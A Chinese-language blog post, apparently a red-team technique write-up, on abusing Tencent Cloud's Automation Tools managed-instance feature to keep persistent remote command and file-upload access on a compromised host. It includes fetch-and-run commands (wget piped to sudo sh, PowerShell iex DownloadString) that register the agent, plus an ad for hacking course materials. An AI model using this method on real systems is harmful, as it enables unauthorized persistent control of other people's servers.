前言

刚好看到一个师傅分享了一个阿里云ECS实战攻防，然后想到了同样利用腾讯云CVM的托管亦可实现在实战攻防中的权限维持。

简介

腾讯云自动化助手（TencentCloud Automation Tools，TAT）是一个原生运维部署工具，它可以在不登录或输入密码的情况下，实现对云服务器 CVM 和轻量应用服务器 Lighthouse 的自动化远程操作。该工具支持批量执行命令，包括 Shell、PowerShell 及 Python 等，能够完成一系列自动化运维任务，如运行自动化脚本、轮询进程、安装/卸载软件、更新应用及安装补丁等。这样的便利性使得企业可以更加高效地管理和维护其云服务器和轻量应用服务器，从而提高其云计算服务的可靠性和安全性。

• 应用场景

上传并运行自动化运维脚本

执行常见操作任务

运行已保存的脚本

托管实例

控制台->自动化助手->托管实例

权限维持

使用默认数值即可，默认值的阈值设定和阿里云的一致

实例创建成功后，可在客户端执行命令

• Linux命令

sudo wget -qO - https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.sh | sudo sh -s -- ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883

• Windows

iex "& { $((New-Object System.Net.WebClient).DownloadString('https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.ps1')) } ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883"

执行命令后发现实例可托管成功，但是是离线状态

帮助网安学习，全套资料S信免费领取：
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集（含答案）
⑧ APP客户端安全检测指南（安卓+IOS）

• 宿主服务器安装自动化助手客户端

root@ubuntu:/home/ubuntu# sudo wget -qO - https://xxxxxxxxx.cos-internal.accelerate.tencentcos.cn/tat_agent/tat_agent_installer.sh | sudo sh

查看探针状态

ps -ef | grep tat_agent

命令后，查看进程状态。如果进程不存在

/usr/local/qcloud/tat_agent/tat_agent   // 启动进程

其实这里的客户端的探针类似于监听状态，一直在线，托管服务器执行命令上线

• 执行命令

执行结果

执行时长48秒

• 文件上传

文件上传权限等均可自定义。

小结

可以明显发现执行时效性不是很流畅，但是优点儿在于：

• 托管权限维持稳定
• 文件上传方便以及文件权限方便